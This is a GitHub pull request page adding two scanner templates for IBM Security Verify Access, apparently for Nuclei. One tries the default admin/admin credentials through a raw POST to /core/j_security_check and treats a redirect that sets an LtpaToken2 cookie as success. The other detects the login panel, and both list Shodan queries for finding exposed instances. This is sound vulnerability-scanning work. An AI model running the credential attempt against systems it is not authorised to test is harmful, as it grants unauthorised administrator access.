Skip to content

IBM Security Verify Access #12306

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 5 commits into from
Jun 24, 2025
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
45 changes: 45 additions & 0 deletions http/default-logins/ibm/ibm-security-verify-default-login.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,45 @@
id: ibm-security-verify-default-login

info:
name: IBM Security Verify Access - Default Login
author: johnk3r
severity: high
description: |
IBM Security Verify Access default admin credentials were discovered. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
verified: true
max-request: 2
shodan-query: title:"IBM Security Verify Access"
tags: ibm,default-login

http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}

- |
POST /core/j_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

j_username={{username}}&j_password={{password}}&commit=&locale=en&_method=PUT

attack: pitchfork
payloads:
username:
- admin
password:
- admin

matchers:
- type: dsl
dsl:
- "len(body) == 0"
- "status_code == 302"
- "contains(set_cookie, 'LtpaToken2')"
condition: and
33 changes: 33 additions & 0 deletions http/exposed-panels/ibm/ibm-security-verify-panel.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
id: ibm-security-verify-panel

info:
name: IBM Security Verify Access Login - Panel
author: johnk3r
severity: info
description: |
IBM Security Verify Access login panel was detected.
reference:
- https://www.ibm.com/docs/en/sva/10.0.8?topic=overview-introduction-security-verify-access
metadata:
max-request: 1
vendor: ibm
shodan-query: http.title:"IBM Security Verify Access"
tags: panel,ibm,login,detect

http:
- method: GET
path:
- "{{BaseURL}}"

host-redirects: true
max-redirects: 2

matchers-condition: and
matchers:
- type: word
words:
- '<title>IBM Security Verify Access</title>'

- type: status
status:
- 200